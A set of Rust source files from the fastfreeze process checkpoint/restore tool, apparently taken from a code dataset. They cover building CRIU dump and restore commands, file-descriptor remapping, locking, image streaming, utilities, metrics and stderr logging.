// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ collections::{HashSet, HashMap}, os::unix::io::RawFd, }; use serde::{Serialize, Deserialize}; use crate::{ consts::*, process::Command, util::{get_inheritable_fds, readlink_fd, is_term}, }; // Say the application was originally run with "fastfreeze run app | cat". // It started with a pipe as stdout. The application may have had duped its fds over its lifetime. // When we restore, with the same command, we want to replace the occurances of the old // pipe with the new one. To do so, we need to remember the original pipe inode // and replace all occurrences of it with the new stdout that we are running // with. That's where the CRIU --inherit-fd option helps us with. It replaces // all occurrences of a given resource with a specific fd. // The `InheritableResources` struct helps us with doing all this. #[derive(Serialize, Deserialize)] pub struct InheritableResources(pub HashMap<String, Vec<RawFd>>); impl InheritableResources { /// Returns the list of inheritable resources. These are resources that the application /// gains access to, for example a stdout connected to a pipe that has been created outside /// of the app container. Regular files don't count as they are accessible from /// the application container, and do not need special handling. /// Each resource comes with a list of associated file descriptors. 
pub fn current() -> Result<Self> { let mut resources: HashMap<String, Vec<RawFd>> = HashMap::new(); for fd in get_inheritable_fds()? { let res_name = readlink_fd(fd)?.to_string_lossy().into_owned(); if let Some(fds) = resources.get_mut(&res_name) { fds.push(fd); } else { resources.insert(res_name, vec![fd]); } } // CRIU refers to terminal as tty:[rdev:dev], not /dev/pts/0, so we'll // rename the resource name in this case. let resources: HashMap<String, Vec<RawFd>> = resources.into_iter() .map(|(res_name, fds)| if is_term(fds[0]) { // expect() here is okay. If fstat() fails, something terrible must have happened. let stat = nix::sys::stat::fstat(fds[0]).expect("fstat failed"); (format!("tty[{:x}:{:x}]", stat.st_rdev, stat.st_dev), fds) } else { (res_name, fds) } ).collect(); for (res_name, fds) in resources.iter() { debug!("Application inherits {} via fd:{:?}", res_name, fds); } Ok(Self(resources)) } pub fn compatible_with(&self, other: &Self) -> bool { let a_fds: HashSet<_> = self.0.values().collect(); let b_fds: HashSet<_> = other.0.values().collect(); a_fds == b_fds } pub fn add_remaps_criu_opts(&self, criu_cmd: &mut Command) { for (res_name, fds) in &self.0 { // We have a resource that can be opened via multiple fds. // It doesn't matter which one we take. CRIU reopens the fd // correctly anyways through /proc/self/fd/N. let mut fd = fds.iter().cloned().next().expect("missing resource fd"); if fd == libc::STDERR_FILENO { // Here's a bit of a problem. CRIU is getting a redirected pipe // for stderr so we can buffer its output in run.rs via // enable_stderr_logging. That means that we can't export the // original stderr on fd=2. We are going to use another one. // // TODO close that file descriptor once we have forked the CRIU // command. fd = nix::unistd::dup(fd).expect("dup() failed"); } criu_cmd .arg("--inherit-fd") .arg(format!("fd[{}]:{}", fd, res_name)); } } } // CRIU is running under our CPUID virtualization. // The CPUID that it detects is virtualized. 
pub fn criu_dump_cmd() -> Command { let mut cmd = Command::new(&[ "criu", "dump", "--tree", &APP_ROOT_PID.to_string(), "--leave-stopped", // Leave app stopped: we resume app once the filesystem is tarred. // The rest are some networking options. In a nutshell, we want all // external connections to be closed on restore. "--empty-ns", "net", "--tcp-established", "--skip-in-flight", "--tcp-close", "--ext-unix-sk" ]); add_common_criu_opts(&mut cmd); cmd } pub fn criu_restore_cmd( leave_stopped: bool, previously_inherited_resources: &InheritableResources, ) -> Command { let mut cmd = Command::new(&[ "criu", "restore", "--restore-sibling", "--restore-detached", // Become parent of the app (CLONE_PARENT) // The rest are some networking options. In a nutshell, we want all // external connections to be closed on restore. "--tcp-close", "--ext-unix-sk", ]); if leave_stopped { cmd.arg("--leave-stopped"); } add_common_criu_opts(&mut cmd); previously_inherited_resources .add_remaps_criu_opts(&mut cmd); cmd } fn add_common_criu_opts(cmd: &mut Command) { cmd.arg("--images-dir").arg(&*CRIU_SOCKET_DIR); cmd.args(&[ "--cpu-cap", // Save and check CPUID information in the image "--shell-job", // Support attached TTYs "--file-locks", // Support file locks // CRIU has an experimental feature for checking file integrity. // It can read the build-id in ELF headers during dump, and compare it during restore. // Currently, it emits warnings during dump. So we'll skip it for now. "--file-validation", "filesize", "--stream", // Use criu-image-streamer ]); if log_enabled!(log::Level::Trace) { cmd.arg("-v"); // verbose cmd.arg("--display-stats"); } let extra_opts = std::env::var_os("CRIU_OPTS").unwrap_or_default(); cmd.args(extra_opts.to_str() .expect("CRIU_OPTS is UTF8 malformed") .split_whitespace()); } pub fn criu_check_cmd() -> Command { Command::new(&["criu", "check"]) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/lock.rs
src/lock.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::AsRawFd, time::{Instant, Duration}, path::Path, fs, }; use nix::{ Error, errno::Errno, fcntl::{flock, FlockArg} }; use crate::{ consts::*, signal::check_for_pending_sigterm, }; #[must_use = "if unused, the lock will immediately unlock"] /// When `FileLockGuard` is dropped, the corresponding `fs::File` is closed, unlocking the file. pub struct FileLockGuard(fs::File); #[derive(Debug)] struct LockTimeoutError; impl std::error::Error for LockTimeoutError {} impl std::fmt::Display for LockTimeoutError { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Lock timeout exeeded") } } pub fn file_lock(path: &Path, timeout: Option<Instant>, exclusive: bool) -> Result<FileLockGuard> { // Instead of using alarm() to support timeout, we use the non-blocking // version of flock to avoid races. 
let flag = match (timeout.is_some(), exclusive) { (true, true) => FlockArg::LockExclusiveNonblock, (true, false) => FlockArg::LockSharedNonblock, (false, true) => FlockArg::LockExclusive, (false, false) => FlockArg::LockShared, }; let file = fs::File::create(path) .with_context(|| format!("Failed to create lock file {}", path.display()))?; trace!("Waiting to acquire file lock at {}", path.display()); loop { check_for_pending_sigterm()?; match (flock(file.as_raw_fd(), flag), timeout.as_ref()) { (Err(Error::Sys(Errno::EAGAIN)), Some(timeout)) => { ensure!(Instant::now() < *timeout, LockTimeoutError); std::thread::sleep(Duration::from_millis(100)); }, (Err(Error::Sys(Errno::EINTR)), _) => {}, (Err(e), _) => bail!(e), (Ok(_), _) => break, } } Ok(FileLockGuard(file)) } pub fn checkpoint_restore_lock(timeout: Option<Instant>, exclusive: bool) -> Result<FileLockGuard> { file_lock(&*LOCK_FILE_PATH, timeout, exclusive).map_err(|e| match e.downcast::<LockTimeoutError>() { Ok(_) => anyhow!("Previous checkpoint/restore operation still in progress"), Err(e) => e, } ) } pub fn with_checkpoint_restore_lock<F,R>(f: F) -> Result<R> where F: FnOnce() -> Result<R>, { let _lock_guard = { // We use a 1 second timeout because we could be racing with a "fastfreeze // wait" command, which holds the lock for a tiny amount of time. Otherwise, // we would use 0 timeout. let timeout = Some(Instant::now() + Duration::from_secs(1)); checkpoint_restore_lock(timeout, true)? }; f() }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image_streamer.rs
src/image_streamer.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::{RawFd, AsRawFd}, fs, io::BufReader, io::BufRead, io::Lines, path::Path, }; use serde::{Serialize, Deserialize}; use crate::{ consts::*, util::Pipe, process::{Command, Process, PipeCommandExt}, }; pub struct Progress { pub fd: RawFd, pub lines: Lines<BufReader<fs::File>>, } impl Progress { fn get_next_progress_line(&mut self) -> Result<String> { Ok(self.lines.next() .ok_or_else(|| anyhow!("EOF unexpectedly reached")) .context("Failed to read progress from the streamer")??) } pub fn wait_for_socket_init(&mut self) -> Result<()> { ensure!(self.get_next_progress_line()? == "socket-init", "criu-image-streamer failed to initialize"); Ok(()) } pub fn wait_for_checkpoint_start(&mut self) -> Result<()> { ensure!(self.get_next_progress_line()? 
== "checkpoint-start", "criu-image-streamer failed to send start message"); Ok(()) } pub fn wait_for_stats(&mut self) -> Result<Stats> { let stats_json = self.get_next_progress_line()?; Ok(serde_json::from_str::<ImageStreamerStats>(&stats_json)?.into()) } } pub struct ImageStreamer { pub process: Process, pub progress: Progress, pub tar_fs_pipe: Option<fs::File>, pub shard_pipes: Vec<fs::File>, } impl ImageStreamer { pub fn spawn_capture(num_shards: usize) -> Result<Self> { let progress = Pipe::new_output()?; let fs_tar = Pipe::new_input()?; let shards = (0..num_shards) .map(|_| Pipe::new_output()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--ext-file-fds", &format!("fs.tar:{}", fs_tar.read.as_raw_fd()), "--shard-fds", &shards.iter() .map(|o| o.write.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), ]); cmd .arg("--images-dir").arg(&*CRIU_SOCKET_DIR) .arg("capture") .enable_stderr_logging("streamer"); Ok(Self { process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: Some(fs_tar.write), shard_pipes: shards.into_iter().map(|o| o.read).collect(), }) } pub fn spawn_serve(num_shards: usize, tcp_listen_remaps: Vec<String>) -> Result<Self> { let progress = Pipe::new_output()?; let fs_tar = Pipe::new_output()?; let shards = (0..num_shards) .map(|_| Pipe::new_input()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--ext-file-fds", &format!("fs.tar:{}", fs_tar.write.as_raw_fd()), "--shard-fds", &shards.iter() .map(|o| o.read.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), ]); if !tcp_listen_remaps.is_empty() { cmd.arg("--tcp-listen-remap").arg(&tcp_listen_remaps.join(",")); } cmd .arg("--images-dir").arg(&*CRIU_SOCKET_DIR) .arg("serve") .enable_stderr_logging("streamer"); Ok(Self { 
process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: Some(fs_tar.read), shard_pipes: shards.into_iter().map(|o| o.write).collect(), }) } pub fn spawn_extract(num_shards: usize, output_dir: &Path) -> Result<Self> { let progress = Pipe::new_output()?; let shards = (0..num_shards) .map(|_| Pipe::new_input()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--shard-fds", &shards.iter() .map(|o| o.read.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), "--images-dir" ]); cmd.arg(output_dir) .arg("extract") .enable_stderr_logging("streamer"); Ok(Self { process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: None, shard_pipes: shards.into_iter().map(|o| o.write).collect(), }) } } #[derive(Serialize, Deserialize)] pub struct ImageStreamerStats { pub shards: Vec<ImageStreamerShardStat>, } #[derive(Serialize, Deserialize)] pub struct ImageStreamerShardStat { pub size: u64, pub transfer_duration_millis: u128, } // These are emitted for metrics #[derive(Serialize, Deserialize)] pub struct Stats { pub total_size_mb: f64, pub total_duration_sec: f64, pub rate_mb_per_sec: f64, pub shards: Vec<ShardStat>, } #[derive(Serialize, Deserialize)] pub struct ShardStat { pub size_mb: f64, pub duration_sec: f64, pub rate_mb_per_sec: f64, } impl Stats { pub fn show(&self) { info!("Uncompressed image size is {:.0} MiB, rate: {:.0} MiB/s", self.total_size_mb, self.rate_mb_per_sec); if log_enabled!(log::Level::Debug) && self.shards.len() > 1 { for (i, shard) in self.shards.iter().enumerate() { debug!(" Shard {}: {:.0} MiB, rate: {:.0} MiB/s", i+1, shard.size_mb, shard.rate_mb_per_sec); } } // To show the compressed rates, we need to examine the output pipes. 
// But that will cost us some CPU overhead as there's no way to get // stats on a kernel pipe, to my knowledge. } } impl From<ImageStreamerStats> for Stats { fn from(stats: ImageStreamerStats) -> Self { let total_size: u64 = stats.shards.iter().map(|s| s.size).sum(); let total_duration_millis = stats.shards.iter().map(|s| s.transfer_duration_millis).max().unwrap_or(0); let total_size_mb = total_size as f64 / MB as f64; let total_duration_sec = total_duration_millis as f64 / 1000.0; let rate_mb_per_sec = if total_duration_sec == 0.0 { 0.0 } else { total_size_mb / total_duration_sec }; let shards = stats.shards.into_iter().map(|s| { let size_mb = s.size as f64 / MB as f64; let duration_sec = s.transfer_duration_millis as f64 / 1000.0; let rate_mb_per_sec = if duration_sec == 0.0 { 0.0 } else { size_mb / duration_sec }; ShardStat { size_mb, duration_sec, rate_mb_per_sec } }).collect::<Vec<_>>(); Self { total_size_mb, total_duration_sec, rate_mb_per_sec, shards } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/util.rs
src/util.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::{RawFd, AsRawFd, FromRawFd}, path::{PathBuf, Path}, env, ffi::OsString, fs::{self, Permissions}, os::unix::fs::PermissionsExt, io::prelude::*, io::SeekFrom, }; use nix::{ fcntl::{fcntl, FcntlArg, FdFlag, OFlag}, poll::{poll, PollFd}, sched::CloneFlags, sys::stat::Mode, sys::uio::pwrite, unistd::pipe2 }; use crate::{ consts::*, signal::{IsErrorInterrupt, retry_on_interrupt}, }; use serde_json::Value; use rand::{thread_rng, Rng, distributions::Alphanumeric}; use url::Url; pub fn gen_random_alphanum_string(len: usize) -> String { thread_rng() .sample_iter(&Alphanumeric) .take(len) .collect() } // This is essentially what stream_len() does in the std lib, but it is // unstable. We use this in the meantime. pub fn get_file_size(file: &mut fs::File) -> Result<u64> { let old_pos = file.seek(SeekFrom::Current(0))?; let len = file.seek(SeekFrom::End(0))?; if old_pos != len { file.seek(SeekFrom::Start(old_pos))?; } Ok(len) } pub fn get_inheritable_fds() -> Result<Vec<RawFd>> { || -> Result<Vec<RawFd>> { let mut result = vec![]; for entry in fs::read_dir("/proc/self/fd")? 
{ let fd = entry?.file_name().to_string_lossy().parse()?; let fd_flags = fcntl(fd, FcntlArg::F_GETFD)?; let fd_flags = FdFlag::from_bits_truncate(fd_flags); if !fd_flags.contains(FdFlag::FD_CLOEXEC) { result.push(fd); } } Ok(result) }().context("Failed to enumerate file descriptors") } pub fn readlink_fd(fd: RawFd) -> Result<PathBuf> { let path = format!("/proc/self/fd/{}", fd); fs::read_link(&path) .with_context(|| format!("Failed to readlink {}", &path)) } pub fn is_term(fd: RawFd) -> bool { nix::sys::termios::tcgetattr(fd).is_ok() } pub fn pwrite_all(file: &fs::File, buf: &[u8], offset: i64) -> Result<()> { let mut buf_off = 0; while buf_off < buf.len() { let file_offset = offset.checked_add(buf_off as i64).expect("File offset overflown"); let written = retry_on_interrupt(|| pwrite(file.as_raw_fd(), &buf[buf_off..], file_offset) )?; buf_off += written; } Ok(()) } pub fn poll_nointr(fds: &mut [PollFd], timeout: libc::c_int) -> nix::Result<libc::c_int> { match poll(fds, timeout) { Err(e) if e.is_interrupt() => Ok(0), result => result, } } pub struct Pipe { pub read: fs::File, pub write: fs::File, } impl Pipe { pub fn new(flags: OFlag) -> Result<Self> { let (fd_r, fd_w) = pipe2(flags).context("Failed to create a pipe")?; let read = unsafe { fs::File::from_raw_fd(fd_r) }; let write = unsafe { fs::File::from_raw_fd(fd_w) }; Ok(Self { read, write }) } } pub fn create_dir_all(path: impl AsRef<Path>) -> Result<()> { fs::create_dir_all(path.as_ref()) .with_context(|| format!("Failed to create directory {}", path.as_ref().display())) } pub fn copy_file(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<u64> { fs::copy(from.as_ref(), to.as_ref()) .with_context(|| format!("Failed to copy file {} to {}", from.as_ref().display(), to.as_ref().display())) } pub fn openat(path: &fs::File, filename: impl AsRef<Path>) -> Result<fs::File> { let fd = nix::fcntl::openat(path.as_raw_fd(), filename.as_ref(), OFlag::O_RDONLY, Mode::empty()) .with_context(|| format!("Failed to open 
{}", filename.as_ref().display()))?; unsafe { Ok(fs::File::from_raw_fd(fd)) } } pub fn setns(nsfile: &fs::File, flag: CloneFlags) -> Result<()> { let res = unsafe { libc::setns(nsfile.as_raw_fd(), flag.bits()) }; nix::errno::Errno::result(res) .with_context(|| format!("Failed to enter namespace. setns({:?}) failed", flag)) .map(drop) } // TODO DELETE pub fn cap_ambient_raise(cap: u32) -> Result<()> { let res = unsafe { libc::prctl(libc::PR_CAP_AMBIENT, libc::PR_CAP_AMBIENT_RAISE, cap, 0, 0) }; nix::errno::Errno::result(res) .with_context(|| format!("Failed to raise ambient cap {}", cap)) .map(drop) } pub fn find_lib(lib_name: impl AsRef<Path>) -> Result<PathBuf> { // We could do a more efficient implementation, but it hurts readability, // but we don't do it, because we like readability more. let lib_name = lib_name.as_ref(); let mut search_paths = vec![]; if let Some(ld_library_paths) = env::var_os("LD_LIBRARY_PATH") { search_paths.extend(env::split_paths(&ld_library_paths)); } search_paths.extend(LIB_SEARCH_PATHS.iter().map(PathBuf::from)); for base_path in search_paths { let path = base_path.join(lib_name); if path.exists() { return Ok(path.canonicalize()?); } } bail!("Failed to find {}. Try adding its directory to LD_LIBRARY_PATH", lib_name.display()); } pub fn atomic_symlink(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<()> { use std::os::unix::fs::symlink; // An awkward way to do `format!("{}.tmp", to)` but with OsString let mut to_tmp = OsString::from(to.as_ref()); to_tmp.push(".tmp"); symlink(from, &to_tmp)?; fs::rename(&to_tmp, to) .map_err(|e| { let _ = fs::remove_file(&to_tmp); e })?; Ok(()) } pub fn set_tmp_like_permissions(from: impl AsRef<Path>) -> Result<()> { fs::set_permissions(from.as_ref(), Permissions::from_mode(0o1777)) .with_context(|| format!("Failed to chmod 1777 {}", from.as_ref().display())) } pub fn get_home_dir() -> Option<PathBuf> { // It is said to be deprecated, but it's fine on Linux. 
#[allow(deprecated)] std::env::home_dir() .and_then(|h| if h.to_string_lossy().is_empty() { None } else { Some(h) }) } pub trait JsonMerge { fn merge(self, b: Value) -> Self; } impl JsonMerge for Value { fn merge(self, b: Value) -> Self { match (self, b) { (Value::Object(mut a), Value::Object(b)) => { a.extend(b); Value::Object(a) } _ => panic!() } } } pub trait UrlExt { fn raw_join(&self, file: &str) -> Url; } impl UrlExt for Url { fn raw_join(&self, file: &str) -> Url { // `Url` provides a join() method, but tries to be too smart let mut url = self.clone(); url.path_segments_mut() .expect("URL base error") .push(file); url } } #[test] fn url_join_test() -> Result<()> { let url = Url::parse("s3://bucket_name/dir/image_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/dir/image_name/file"); let url = Url::parse("s3://bucket_name/image_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/image_name/file"); let url = Url::parse("s3://bucket_name/")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/file"); let url = Url::parse("s3://bucket_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/file"); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/main.rs
src/main.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod logger; pub mod util; pub mod process; pub mod cli; pub mod store; pub mod image; pub mod virt; pub mod metrics; pub mod consts; pub mod criu; pub mod filesystem; pub mod image_streamer; pub mod lock; pub mod signal; pub mod container; #[macro_use] extern crate anyhow; #[macro_use] extern crate log; #[macro_use] extern crate lazy_static; #[macro_use] extern crate serde_json; use anyhow::Result; use logger::is_logger_ready; use structopt::StructOpt; use crate::{ consts::*, cli::{ExitCode, CLI}, virt::disable_local_time_virtualization, signal::trap_sigterm_and_friends, }; fn main() { fn do_main() -> Result<()> { // We have to be exempt from time virtualization because we use // `Instant::now()`, which uses CLOCK_MONOTONIC. // disable_local_time_virtualization() does an execve() if needed. 
disable_local_time_virtualization()?; // START_TIME is used for logging purposes lazy_static::initialize(&START_TIME); // Trapping signals is important for cleanups (e.g., kill children) before we exit trap_sigterm_and_friends()?; let opts = cli::Opts::from_args(); opts.init_logger()?; opts.run() } if let Err(e) = do_main() { if is_logger_ready() { error!("{:#}", e); } else { eprintln!("{:#}", e); } let exit_code = ExitCode::from_error(&e); if exit_code == EXIT_CODE_RESTORE_FAILURE { log::error!("You may try again with --no-restore to run the application from scratch"); } std::process::exit(exit_code as i32); } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/metrics.rs
src/metrics.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ ffi::OsString, time::Instant, }; use crate::{ consts::*, process::{Process, Command, ProcessError, ProcessGroupError}, util::JsonMerge, }; use serde_json::Value; lazy_static! { static ref METRICS_RECORDER_PATH: Option<OsString> = std::env::var_os("FF_METRICS_RECORDER"); static ref ARGS_JSON: Value = serde_json::to_value(std::env::args().collect::<Vec<String>>()) .expect("Failed to serialize CLI arguments into json"); } pub fn emit_metrics(event: Value) -> Result<Option<Process>> { let metrics_recorder_path = match METRICS_RECORDER_PATH.as_ref() { Some(path) => path, None => return Ok(None), }; let payload = json!({ "invocation_id": *INVOCATION_ID, "elapsed_time": START_TIME.elapsed().as_secs_f64(), "cli_args": *ARGS_JSON, }).merge(event); let p = Command::new_shell(&metrics_recorder_path) .arg(&serde_json::to_string(&payload)?) 
.show_cmd_on_spawn(log_enabled!(log::Level::Trace)) .spawn() .context("Failed to spawn the metrics program")?; Ok(Some(p)) } pub fn with_metrics_raw<F,M,R>(action: &str, f: F, metrics_f: M) -> Result<R> where F: FnOnce() -> Result<R>, M: Fn(&Result<R>) -> Value { if METRICS_RECORDER_PATH.is_none() { return f(); } let start_time = Instant::now(); let result = f(); let event = json!({ "action": action, "duration": start_time.elapsed().as_secs_f64(), }).merge(metrics_f(&result)); // If the metrics CLI fails, we don't return the error to the caller. // Instead, we log the error and move on. emit_metrics(event)?.map(|p| p.reap_on_drop()); result } pub fn with_metrics<F,M,R>(action: &str, f: F, metrics_f: M) -> Result<R> where F: FnOnce() -> Result<R>, M: Fn(&R) -> Value { with_metrics_raw(action, f, |result| match result { Ok(result) => json!({ "outcome": "success", }).merge(metrics_f(result)), Err(e) => json!({ "outcome": "error", "error": format!("{:#}", e), }).merge(metrics_error_json(e)), } ) } pub fn metrics_error_json(e: &anyhow::Error) -> Value { if let Some(e) = e.downcast_ref::<ProcessError>() { json!({"process": e.to_json()}) } else if let Some(e) = e.downcast_ref::<ProcessGroupError>() { json!({"process": e.to_json()}) } else { json!({}) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/stderr_logger.rs
src/process/stderr_logger.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Error}; use std::{ borrow::Cow, os::unix::io::{AsRawFd, RawFd}, collections::VecDeque, io::{BufReader, BufRead, ErrorKind}, }; use nix::{ fcntl::OFlag, fcntl::{fcntl, FcntlArg}, }; pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output as StdOutput, Child }; use crate::{ consts::*, }; // We create our own `Child` wrapper to provide better error context. // We further expose a slightly different API than what is offered from the stdlib. // to incorporate SIGTERM monitoring, and helpful error messages pub struct StderrReader { reader: BufReader<ChildStderr>, pub fd: RawFd, } impl StderrReader { pub fn new(stderr: ChildStderr) -> Self { let fd = stderr.as_raw_fd(); let reader = BufReader::new(stderr); let mut self_ = Self { reader, fd }; self_.set_blocking(false); self_ } pub fn set_blocking(&mut self, blocking: bool) -> &mut Self { let flag = if blocking { OFlag::empty() } else { OFlag::O_NONBLOCK }; fcntl(self.fd, FcntlArg::F_SETFL(flag)) .expect("Failed to fcntl() on stderr"); self } pub fn drain(&mut self, tail: &mut StderrTail) -> Result<()> { // Read all lines until we reach an -EAGAIN // Each line is emitted to the logs, and saved into the backlog let mut line = String::new(); loop { // XXX there's no bounds on the line size. If we don't get a "\n" // when reading stderr, we can blow up in memory utilization. 
// It's a risk we are willing to take, given that we assume the // programs we run (tar, criu) are well behaved. match self.reader.read_line(&mut line) { Err(err) if err.kind() == ErrorKind::WouldBlock => break, Err(err) => bail!(self.format_read_error(anyhow!(err), &tail.log_prefix, &line)), Ok(0) => break, // Reached EOF Ok(_) => tail.log_line(&line), } line.clear(); } Ok(()) } fn format_read_error(&self, err: Error, log_prefix: &str, line: &str) -> Error { let mut e = anyhow!(err).context( format!("Failed to read stderr from `{}`", log_prefix)); if !line.is_empty() { e = e.context(format!("Partial stderr read : `{}`", line)); } e } } #[derive(Clone, Debug)] pub struct StderrTail { pub log_prefix: Cow<'static, str>, /// We buffer the last few lines of stderr so that we can emit metrics with the /// stderr of the process. pub tail: VecDeque<Box<str>>, } impl StderrTail { pub fn new(log_prefix: Cow<'static, str>) -> Self { let tail = VecDeque::with_capacity(STDERR_TAIL_NUM_LINES); Self { log_prefix, tail } } fn log_line(&mut self, line: &str) { let line = line.trim(); if line.is_empty() { return; } info!("{}> {}", self.log_prefix, line); if self.tail.len() == self.tail.capacity() { self.tail.pop_front(); } self.tail.push_back(line.into()); } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/command.rs
src/process/command.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ borrow::Cow, io::Result as IoResult, os::unix::io::AsRawFd, ffi::{OsString, OsStr}, collections::HashMap, process::Command as StdCommand, os::unix::process::CommandExt, }; use nix::{ fcntl::{fcntl, FcntlArg, FdFlag, OFlag}, }; use crate::util::Pipe; use super::Process; // We re-export these, as they are part of our API pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output }; pub type EnvVars = HashMap<OsString, OsString>; // We wrap the standard library `Command` to provide additional features: // * Logging of the command executed, and failures // * setpgrp() // We have to delegate a few methods to the inner `StdCommand`, which makes it a bit verbose. // We considered the subprocess crate, but it wasn't very useful, and it lacked // the crucial feature of pre_exec() that the standard library has for doing setpgrp(). 
